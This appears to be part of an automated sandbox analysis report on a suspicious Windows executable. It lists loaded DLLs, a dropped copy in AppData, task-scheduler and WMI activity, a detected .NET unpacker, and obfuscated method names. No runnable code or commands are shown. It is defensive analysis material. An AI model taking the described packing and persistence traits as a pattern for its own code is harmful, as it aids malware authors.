Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: msvbvm60.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: vb6zz.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: winsqlite3.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: vbscript.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: zipfldr.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: msxml3.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: mlang.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Section loaded: esscli.dll

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: yMvZXcwN2OdoP6x.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: yMvZXcwN2OdoP6x.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.yMvZXcwN2OdoP6x.exe.3f21d80.2.raw.unpack, L2.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, wnwYX3cihVFWvaiD12.cs	.Net Code: UDWeib4RIt System.Reflection.Assembly.Load(byte[])
Source: 0.2.yMvZXcwN2OdoP6x.exe.76a0000.8.raw.unpack, L2.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.yMvZXcwN2OdoP6x.exe.2864744.0.raw.unpack, L2.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, wnwYX3cihVFWvaiD12.cs	.Net Code: UDWeib4RIt System.Reflection.Assembly.Load(byte[])
Source: 11.2.LjlEiSlJe.exe.2a44904.1.raw.unpack, L2.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B821B8 push eax; iretd	0_2_04B824BE
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B824B0 push es; retf	0_2_04B824B2
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B824B3 push eax; iretd	0_2_04B824BE
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B82579 push es; retf	0_2_04B8257A
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B8257B push es; retf	0_2_04B82582
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B82C18 push ebx; iretd	0_2_04B82C26
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B82D41 push ecx; iretd	0_2_04B82D4E
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B8285B push eax; iretd	0_2_04B8285E
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B8348B push cs; retf	0_2_04B83492
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B81CD3 push ebx; iretd	0_2_04B81CE3
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B81AB6 push ebx; iretd	0_2_04B81ACD
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_04B81B74 push eax; iretd	0_2_04B81B75
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Code function: 0_2_07723DBE push esi; ret	0_2_07723DC7

Source: yMvZXcwN2OdoP6x.exe	Static PE information: section name: .text entropy: 7.841450214817603
Source: LjlEiSlJe.exe.0.dr	Static PE information: section name: .text entropy: 7.841450214817603

Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, RPCy0QmcsZGCZpK6gZ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'aDE0luAlA0', 'aEe0MrN6jW', 'qnf0zERTsI', 'nI5sIE4L8E', 'sNLsOGX7E5', 'uhns0h3dxR', 'CB6ss6mHT0', 'WbMEpUk8YEfJNihqjPB'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, v4cju63LrsyQ8kx4XB.cs	High entropy of concatenated method names: 'g7jkFAaH4r', 'rZjkbuPc4j', 'BjNkkYTwfF', 'wABkdJrrgW', 'u75kXNbhbv', 'gvtkvvu3yl', 'Dispose', 'SXyCJ8krHa', 'qW1CG5ibAj', 'O5JCmjRMdr'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, kharxuBaGhoE6pnhQW.cs	High entropy of concatenated method names: 'qqVb4vFARI', 'UOib6RCBhL', 'ToString', 'lrmbJgeZ1V', 'varbGlOPTV', 'xymbmXyMp4', 'DO4brdb8Fw', 'TkgbN8I3nJ', 'eVKbqXi2Sg', 'QvjbcCuKfU'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, iKyFLHlwETw7FuflfC.cs	High entropy of concatenated method names: 'Xeukn5Yqjg', 'tc8k20wCxa', 'hJokWH88cq', 'q3lkPYk4CM', 'kjCkVRwxY7', 'sUlkDXiYMw', 'BAjkE7K9hm', 'lhbkoW4wch', 'TTjkKWF7C7', 'Swakt7AmxW'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, iOvT2CzTDIAbC2WXnS.cs	High entropy of concatenated method names: 'vm9xTHTF7J', 'uTJxAdtc1t', 'HVjxhEChBx', 'jdRxnpQFBp', 'wB1x2Z3rGN', 'W88xPUHD79', 'IVCxV9w9Rc', 'VGHxvMVThx', 'FcdxfFxd5X', 'JTPxguxsUK'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, Gp6AyLn7U3XKHop2Ct.cs	High entropy of concatenated method names: 'LQ0N5OAVm8', 'eawNGonIQW', 'MW6NrfMQ2P', 'auwNqT276i', 'HGANccFAMi', 'HdlrYklByN', 'lkAr9b98RL', 'WKer3JB3rb', 'I9ArjAAZEa', 'x3Nrl0Ryp2'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, YDbVS8UvXmKhnOYefu.cs	High entropy of concatenated method names: 'evipAmX5jM', 'xLtphygWD9', 'CRbpnBlx1N', 'MdJp2VUP6A', 'Xd6pPlWfxl', 'gIPpVjkpKX', 'waapERrEal', 'olypoQsHXK', 'ac5ptDPE58', 'uZHp7IYUVH'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, xRjS6XKGgFHIDYGj6b.cs	High entropy of concatenated method names: 'm2UqfIU6O1', 'V2Gqg01uFj', 'B40qiECYKy', 'iNQqujrfdS', 'nBaqRhBvM3', 'jxYqTZEobw', 'kDtq83XKLv', 'wPXqACfg4o', 'IIbqh0bCv9', 'hvaqLv2S57'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, JY2qdR96bpxm3G8YfZ.cs	High entropy of concatenated method names: 'vkIbjAQRlZ', 'oENbM4boMA', 'hBdCInvTMb', 'yUFCOa3uyH', 'dNtb7pYF0S', 'OX9byHIkmL', 'rwVbUsomYt', 'ryIbaYT6pO', 'bs2b1yxT4C', 'CQrbQMUqTB'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, bOCTDJOet9LwxgpdbK0.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SOqSkNbuvs', 'YVOSx4gE9C', 'MqHSdoAnDs', 'aAwSS40Qks', 'HG2SXhpwoC', 'BrESZDAoFC', 'MyNSvtobsK'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, qBhfO3L1uDBOEPGMeC.cs	High entropy of concatenated method names: 'o4CrRIY9cb', 'fvir8fjMuv', 'S51mWnYha9', 'pFwmP2hAc1', 'gDbmVPg4I9', 'F5MmDTyViE', 'sLtmEgXLyF', 'nQymohxii6', 'XLBmK6vYti', 'cf7mtvvt8R'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, zMGcexhUviBX4Y5L42.cs	High entropy of concatenated method names: 'RCjmuNXuXf', 'uwQmTnbAgS', 'fBKmAqcMPR', 'GEcmhg1fuW', 'uT5mFHXGDv', 'RU4mwfCMPk', 'KmLmbqdM3r', 'fabmCKmR0i', 'Wrdmk2lnEr', 'nAKmx7nb3e'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, O76oEJAdf3ugVbiFUb.cs	High entropy of concatenated method names: 'JKDGaXgWL8', 'mIXG1tyvKe', 'LoAGQX4j1I', 'pDXGBHoEiy', 'cZbGYg9TKa', 'gcVG9S0U4P', 'BlkG3vWh3E', 'hbVGjDTB1H', 'X7LGl8kROF', 'hhHGMnyHT2'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, wnwYX3cihVFWvaiD12.cs	High entropy of concatenated method names: 'eTws5IZXxK', 'DjpsJ6hqCh', 'zklsGPtk8x', 'u35smwsxsA', 'fGSsrD4arJ', 'YWwsNvmy3W', 'sl3sqRXa1y', 'XNHsclhX6P', 'L98sHpCqK8', 'j7us4tmKeI'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, mmYetxOOrsmPb1cXOkI.cs	High entropy of concatenated method names: 'fQdxMhy0oY', 'UJfxzhvUFv', 'uRvdIYXJnR', 'PRMdO1YWEd', 'O2xd0LvlY5', 'bR6ds6CoVe', 'U5ZdenAGjT', 'aE8d5SDHyq', 'zUqdJYFF3i', 'ta3dGsBPcU'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, xnqgyUMf8MwIZeGiwK.cs	High entropy of concatenated method names: 'FtQxmxFnfW', 'dE3xr9KBiP', 'nePxN8fMPe', 'DwWxq0d8BX', 'MMaxkXq740', 'xdYxc2fiFB', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, tqn7OyeQyS8LDTqloR.cs	High entropy of concatenated method names: 'Vm7Oq76oEJ', 'tf3OcugVbi', 'tUvO4iBX4Y', 'eL4O62CBhf', 'IGMOFeCnp6', 'DyLOw7U3XK', 'OFP74Synre5id8rxpq', 'iXy6iNDo7qTdyLK5HY', 'EfnOO8w8ux', 'r19OsNOBP6'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, vJN1IG0PjgicqCTBLR.cs	High entropy of concatenated method names: 'krriUyOev', 'BjBuVDinc', 'JNxTAPs6b', 'GmM8T4Ihs', 'VYihXSZTh', 'XhxLcafQy', 'DA1aLwYNf4ximdHeKq', 'yqQHwunIl8huNWXsNn', 'ROtCWpSQv', 'BLtxNCGuC'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, XTPLjiGI63Hjf2NhwW.cs	High entropy of concatenated method names: 'Dispose', 'dyQOl8kx4X', 'gKm02kYLdX', 'UFwAYHSjNA', 'TvsOMuXI3P', 'KyDOzeDlbU', 'ProcessDialogKey', 'KoN0IKyFLH', 'pET0Ow7Fuf', 'XfC00fnqgy'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, fiiwkjQXHWqqxnfsbX.cs	High entropy of concatenated method names: 'ToString', 'l4Fw7NyfVL', 'dgTw2Thkt0', 'zN5wWtIuap', 'O8pwP3PpY8', 'Fl7wVQeqBN', 'PCcwDXh3mu', 'qrDwE7WkKh', 'n6MwoHqmFc', 'g31wK8Rgqo'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, j5CGaWaak4bmcIKcIp.cs	High entropy of concatenated method names: 'rGxFtHg93L', 'BX9Fyg0YSr', 'CNGFafaSlT', 'BVJF1mU7nJ', 'IhXF2bpPHM', 'QnvFWQDUKS', 'QIoFPeQuYQ', 'vVwFVytCOM', 'mhbFDclkHP', 'sinFEMZFvs'
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, ccHPehOIgqlOQNa40ac.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TbPx7nsY1c', 'WvPxynPPBQ', 'wAmxUeIFyH', 'TSLxaqIy3F', 'FF8x15t6HD', 'Wt4xQliIeN', 'd9oxB7UaHj'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, RPCy0QmcsZGCZpK6gZ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'aDE0luAlA0', 'aEe0MrN6jW', 'qnf0zERTsI', 'nI5sIE4L8E', 'sNLsOGX7E5', 'uhns0h3dxR', 'CB6ss6mHT0', 'WbMEpUk8YEfJNihqjPB'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, v4cju63LrsyQ8kx4XB.cs	High entropy of concatenated method names: 'g7jkFAaH4r', 'rZjkbuPc4j', 'BjNkkYTwfF', 'wABkdJrrgW', 'u75kXNbhbv', 'gvtkvvu3yl', 'Dispose', 'SXyCJ8krHa', 'qW1CG5ibAj', 'O5JCmjRMdr'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, kharxuBaGhoE6pnhQW.cs	High entropy of concatenated method names: 'qqVb4vFARI', 'UOib6RCBhL', 'ToString', 'lrmbJgeZ1V', 'varbGlOPTV', 'xymbmXyMp4', 'DO4brdb8Fw', 'TkgbN8I3nJ', 'eVKbqXi2Sg', 'QvjbcCuKfU'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, iKyFLHlwETw7FuflfC.cs	High entropy of concatenated method names: 'Xeukn5Yqjg', 'tc8k20wCxa', 'hJokWH88cq', 'q3lkPYk4CM', 'kjCkVRwxY7', 'sUlkDXiYMw', 'BAjkE7K9hm', 'lhbkoW4wch', 'TTjkKWF7C7', 'Swakt7AmxW'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, iOvT2CzTDIAbC2WXnS.cs	High entropy of concatenated method names: 'vm9xTHTF7J', 'uTJxAdtc1t', 'HVjxhEChBx', 'jdRxnpQFBp', 'wB1x2Z3rGN', 'W88xPUHD79', 'IVCxV9w9Rc', 'VGHxvMVThx', 'FcdxfFxd5X', 'JTPxguxsUK'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, Gp6AyLn7U3XKHop2Ct.cs	High entropy of concatenated method names: 'LQ0N5OAVm8', 'eawNGonIQW', 'MW6NrfMQ2P', 'auwNqT276i', 'HGANccFAMi', 'HdlrYklByN', 'lkAr9b98RL', 'WKer3JB3rb', 'I9ArjAAZEa', 'x3Nrl0Ryp2'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, YDbVS8UvXmKhnOYefu.cs	High entropy of concatenated method names: 'evipAmX5jM', 'xLtphygWD9', 'CRbpnBlx1N', 'MdJp2VUP6A', 'Xd6pPlWfxl', 'gIPpVjkpKX', 'waapERrEal', 'olypoQsHXK', 'ac5ptDPE58', 'uZHp7IYUVH'
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, xRjS6XKGgFHIDYGj6b.cs	High entropy of concatenated method names: 'm2UqfIU6O1', 'V2Gqg01uFj', 'B40qiECYKy', 'iNQqujrfdS', 'nBaqRhBvM3', 'jxYqTZEobw', 'kDtq83XKLv', 'wPXqACfg4o', 'IIbqh0bCv9', 'hvaqLv2S57'
